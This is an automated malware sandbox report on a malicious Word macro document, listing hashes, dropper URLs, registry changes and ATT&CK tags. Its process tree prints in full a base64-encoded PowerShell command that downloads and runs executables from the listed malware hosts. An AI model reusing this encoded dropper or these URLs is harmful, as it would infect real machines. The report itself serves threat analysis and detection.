8937064c7ab860bfd3cba7621752a85796caa4092d34225474a42f0f6a5ce234

Analysis

max time kernel
101s
max time network
45s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28/09/2024, 09:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fc0bde955acba33e38199d798b7efc20_JaffaCakes118.doc
Size

159KB
MD5

fc0bde955acba33e38199d798b7efc20
SHA1

b7b62a80275e5dc942c526ec6fb491420f420c1b
SHA256

8937064c7ab860bfd3cba7621752a85796caa4092d34225474a42f0f6a5ce234
SHA512

3d43fe8ef6bd2ecc1c8ce00dee9f18ff8a860f38fcf65a5be88bd229d3db03d5a2238b22b38d3443b253d1fc7be440072c6e92e263d066af01b937dd87d5cb57
SSDEEP

1536:TB445TEgrO3jSWAg83tle1ZZ0293QM0eetR2cOupLB5UZ5F+a9lPzlnb3zSR:T22TWTogk079THcpOu5UZDP5b3zSR

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://jobcapper.com/8.7.19/hrS/

exe.dropper

http://scoomie.com/wp-content/uploads/mxjsB/

exe.dropper

https://blog.workshots.net/bibqcr9/Eki/

exe.dropper

https://hxoptical.net/wp-admin/91C/

exe.dropper

https://adidasnmdfootlocker.com/nc_assets/F/

exe.dropper

http://socylmediapc.es/tools/D7Ogq/

exe.dropper

http://lombardzista.pl/wp-content/r/

Signatures

Blocklisted process makes network request 14 IoCs

flow	pid	Process
5	2772	POWeRsHeLL.exe
6	2772	POWeRsHeLL.exe
7	2772	POWeRsHeLL.exe
10	2772	POWeRsHeLL.exe
11	2772	POWeRsHeLL.exe
13	2772	POWeRsHeLL.exe
17	2772	POWeRsHeLL.exe
19	2772	POWeRsHeLL.exe
20	2772	POWeRsHeLL.exe
22	2772	POWeRsHeLL.exe
23	2772	POWeRsHeLL.exe
25	2772	POWeRsHeLL.exe
26	2772	POWeRsHeLL.exe
27	2772	POWeRsHeLL.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POWeRsHeLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1497A87A-62E6-4EF6-9444-81843B79F77E}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{1497A87A-62E6-4EF6-9444-81843B79F77E}\2.0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1497A87A-62E6-4EF6-9444-81843B79F77E}\2.0\FLAGS\ = "6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2716	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2772	POWeRsHeLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	POWeRsHeLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2716	WINWORD.EXE
2716	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2716 wrote to memory of 1080	2716	WINWORD.EXE	33
PID 2716 wrote to memory of 1080	2716	WINWORD.EXE	33
PID 2716 wrote to memory of 1080	2716	WINWORD.EXE	33
PID 2716 wrote to memory of 1080	2716	WINWORD.EXE	33

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fc0bde955acba33e38199d798b7efc20_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2716
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1080

C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exe
POWeRsHeLL -ENCOD JABFAGEAcAB5AHEAYQBkAD0AKAAoACcATgAnACsAJwBoAGsAbgAnACkAKwAnADcAZgAnACsAJwB1ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgB2ADoAdQBzAGUAcgBQAHIAbwBGAEkAbABFAFwAVgBkAHIAUQB0AGUAcABcAFEARAA2AHIATgBCADUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIAZQBDAFQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBSAEkAVAB5AHAAcgBvAHQAYABvAGMAbwBsACIAIAA9ACAAKAAnAHQAbAAnACsAJwBzACcAKwAoACcAMQAyACcAKwAnACwAJwApACsAKAAnACAAdABsACcAKwAnAHMAMQAxACwAJwApACsAKAAnACAAJwArACcAdABsAHMAJwApACkAOwAkAE0AawAzAHMANQBhADgAIAA9ACAAKAAoACcAQgBnAGQAJwArACcAegBjAGEAJwApACsAJwAzACcAKwAnADUAaAAnACkAOwAkAFkANAB1AHEAcgBxAHIAPQAoACcASAAnACsAKAAnADUAdwAnACsAJwBqAHUAJwApACsAJwA1AGEAJwApADsAJABZAHgAXwB2ADgAcAA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAAnACsAJwB9AFYAZAByAHEAdABlAHAAewAwAH0AUQBkACcAKwAoACcANgByAG4AYgAnACsAJwA1ACcAKQArACcAewAnACsAJwAwAH0AJwApAC0AZgBbAEMAaABBAFIAXQA5ADIAKQArACQATQBrADMAcwA1AGEAOAArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAFgAbQA1AGMAMQBzAHUAPQAoACcASwAnACsAKAAnAGcAMAAnACsAJwBlAHgAZwAnACkAKwAnAGoAJwApADsAJABHAHkAbABtAGsAcAB2AD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABuAGUAdAAuAFcAZQBCAGMATABJAGUATgBUADsAJABPAHEAYQA0AHgAeQB4AD0AKAAnAGgAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBqACcAKwAnAG8AYgBjACcAKQArACgAJwBhACcAKwAnAHAAJwArACcAcABlAHIALgBjAG8AbQAnACsAJwAvADgALgA3AC4AMQAnACkAKwAoACcAOQAvAGgAcgBTAC8AKgBoAHQAJwArACcAdABwADoAJwArACcALwAvAHMAYwAnACsAJwBvACcAKwAnAG8AbQBpACcAKwAnAGUALgAnACkAKwAnAGMAbwAnACsAKAAnAG0AJwArACcALwB3AHAAJwApACsAKAAnAC0AYwBvAG4AdAAnACsAJwBlAG4AdAAvACcAKwAnAHUAcABsACcAKQArACgAJwBvACcAKwAnAGEAZABzAC8AJwApACsAJwBtAHgAJwArACgAJwBqACcAKwAnAHMAQgAvACoAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwAnACsAJwA6ACcAKQArACcALwAvACcAKwAoACcAYgAnACsAJwBsAG8AZwAuAHcAbwByAGsAJwApACsAKAAnAHMAJwArACcAaABvAHQAcwAnACkAKwAnAC4AJwArACcAbgBlACcAKwAoACcAdAAvACcAKwAnAGIAJwArACcAaQBiAHEAYwAnACkAKwAnAHIAOQAnACsAJwAvACcAKwAnAEUAawAnACsAKAAnAGkAJwArACcALwAqACcAKQArACgAJwBoAHQAdABwACcAKwAnAHMAOgAvACcAKwAnAC8AaAAnACkAKwAnAHgAJwArACcAbwAnACsAKAAnAHAAdABpACcAKwAnAGMAJwApACsAKAAnAGEAbAAnACsAJwAuAG4AJwApACsAJwBlACcAKwAnAHQAJwArACgAJwAvAHcAJwArACcAcAAnACkAKwAoACcALQAnACsAJwBhAGQAbQAnACkAKwAnAGkAbgAnACsAKAAnAC8AOQAnACsAJwAxAEMALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AYQBkACcAKwAnAGkAJwApACsAKAAnAGQAJwArACcAYQBzACcAKQArACgAJwBuAG0AZABmACcAKwAnAG8AJwApACsAKAAnAG8AdAAnACsAJwBsAG8AYwBrAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBuAGMAXwBhACcAKwAnAHMAcwAnACsAJwBlAHQAJwApACsAJwBzACcAKwAnAC8ARgAnACsAJwAvACoAJwArACcAaAAnACsAKAAnAHQAdABwADoALwAnACsAJwAvACcAKQArACcAcwBvACcAKwAnAGMAJwArACgAJwB5AGwAJwArACcAbQAnACkAKwAoACcAZQAnACsAJwBkAGkAYQAnACkAKwAnAHAAJwArACcAYwAuACcAKwAoACcAZQBzAC8AJwArACcAdABvACcAKwAnAG8AbABzAC8ARAA3ACcAKQArACgAJwBPAGcAJwArACcAcQAnACkAKwAoACcALwAqAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoAJwArACcALwAvAGwAJwApACsAKAAnAG8AbQBiAGEAJwArACcAcgBkAHoAJwArACcAaQBzAHQAYQAuACcAKQArACcAcABsACcAKwAnAC8AJwArACcAdwAnACsAKAAnAHAAJwArACcALQBjAG8AJwApACsAJwBuACcAKwAnAHQAJwArACgAJwBlAG4AJwArACcAdAAvAHIAJwApACsAJwAvACcAKQAuACIAUwBQAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAGMAYwBrAHYAZAAxAD0AKAAnAFgANAAnACsAKAAnADUAMgBtACcAKwAnADQAJwApACsAJwB4ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFoAMABnADkANAB1AHIAIABpAG4AIAAkAE8AcQBhADQAeAB5AHgAKQB7AHQAcgB5AHsAJABHAHkAbABtAGsAcAB2AC4AIgBEAE8AVwBgAE4AbABvAGEAZABgAEYASQBsAEUAIgAoACQAWgAwAGcAOQA0AHUAcgAsACAAJABZAHgAXwB2ADgAcAA4ACkAOwAkAFIAMQBkAHEAYQBlAHkAPQAoACcARwB4ACcAKwAoACcAYQBsAHMAbQAnACsAJwBxACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFkAeABfAHYAOABwADgAKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAyADIANwA2ADIAKQAgAHsALgAoACcASQBuAHYAbwBrAGUALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAoACQAWQB4AF8AdgA4AHAAOAApADsAJABBADQAcwAyADIAMwA1AD0AKAAnAFkAJwArACgAJwBnADkAeQA1ACcAKwAnAHUAeAAnACkAKQA7AGIAcgBlAGEAawA7ACQAUgBxADkAYwA0AHYAbQA9ACgAKAAnAFEAJwArACcAYQA5ACcAKQArACcAYwBwACcAKwAnAG4AdQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFMAZwBtAF8AZQB0ADkAPQAoACgAJwBIADYAYgAnACsAJwAwADEAJwApACsAJwAzAHAAJwApAA==
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
95f1562f681ee3f164879af3f031e098

SHA1
e1e28518893b381d89912d5e388b6005a85e1b48

SHA256
6102ecc67da4ec4f441805f73be5b8a3b89e91cbb9c173923c37598487296e40

SHA512
701f7584035c1321829a525044e0a9547ecf7eae9feee071d6f0ffeca3a1fb9d0af0b92af5f6264006c8ee9ef2378032f9f4507c4c5833a7066a4f1ac7fbe6b0

Download Submit
memory/2716-29-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-31-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-30-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-6-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-7-0x0000000005CA0000-0x0000000005DA0000-memory.dmp

Filesize
1024KB

Download
memory/2716-11-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-22-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-20-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-19-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-18-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-16-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-17-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-15-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-13-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-14-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-12-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-10-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-9-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-8-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-0-0x000000002FB11000-0x000000002FB12000-memory.dmp

Filesize
4KB

Download
memory/2716-2-0x0000000073A5D000-0x0000000073A68000-memory.dmp

Filesize
44KB

Download
memory/2716-32-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-5-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-28-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-27-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-33-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-26-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-25-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-24-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-23-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-21-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-71-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-70-0x0000000073A5D000-0x0000000073A68000-memory.dmp

Filesize
44KB

Download
memory/2716-41-0x0000000073A5D000-0x0000000073A68000-memory.dmp

Filesize
44KB

Download
memory/2716-42-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-43-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-44-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-45-0x0000000000660000-0x0000000000760000-memory.dmp

Filesize
1024KB

Download
memory/2716-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2716-69-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2772-40-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download
memory/2772-39-0x000000001B430000-0x000000001B712000-memory.dmp

Filesize
2.9MB

Download